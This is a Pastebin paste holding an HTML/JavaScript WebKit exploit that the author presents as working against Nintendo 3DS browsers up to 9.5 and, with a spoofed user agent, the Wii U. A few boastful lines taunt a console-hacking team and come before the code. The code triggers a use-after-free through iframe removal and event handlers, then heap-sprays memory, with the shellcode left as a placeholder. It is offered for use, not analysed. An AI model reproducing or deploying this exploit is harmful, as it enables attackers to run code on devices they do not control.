- Too bad that they take too long to figure out how make their Payload working.
- This is a working Webkit Exploit for N3DS/3DS/etc.. up to 9.5.
- I make it more simple, actually iframe display none help ;)
- It also work on Wii U up to 5.3.2 by using User Agent Nintendo 3DS
- Now hopefully devs or this shit team called Gateway 3DS will figure out how their own payload work.
- Special message to MathewE, do you really think that you are the only one who can work with this ?
- I know how you false bug work, including Miiplaza and co, you are late on the party.
- <html>
- <head>
- <style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;}
- </style>
- <script>
- if(parent==window) {
- window.onload = function() {
- document.body.innerHTML += "<iframe src='#' />";
- };
- } else if(navigator.userAgent.indexOf('Nintendo 3DS') != -1) {
- var nb = 0;
- window.onload = function () {
- f = window.frameElement;
- p = f.parentNode;
- var o = document.createElement("object");
- o.addEventListener('beforeload', function () {
- if (++nb == 1) {
- p.addEventListener('DOMSubtreeModified', parent.dsm, false);
- } else if (nb == 2) {
- p.removeChild(f);
- }
- }, false);
- document.body.appendChild(o);
- };
- }
- function magicfun(mem, size, v) {
- var a = new Array(size - 20);
- nv = v + unescape("%ucccc");
- for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
- var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
- mem.push(t);
- }
- function dsm(e) {
- var mem = [];
- for (var j = 20; j < 430; j++)
- magicfun(mem, j, unescape("payload"));
- }
- </script>
- </head>
- <body>
- </body>
- </html>
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.
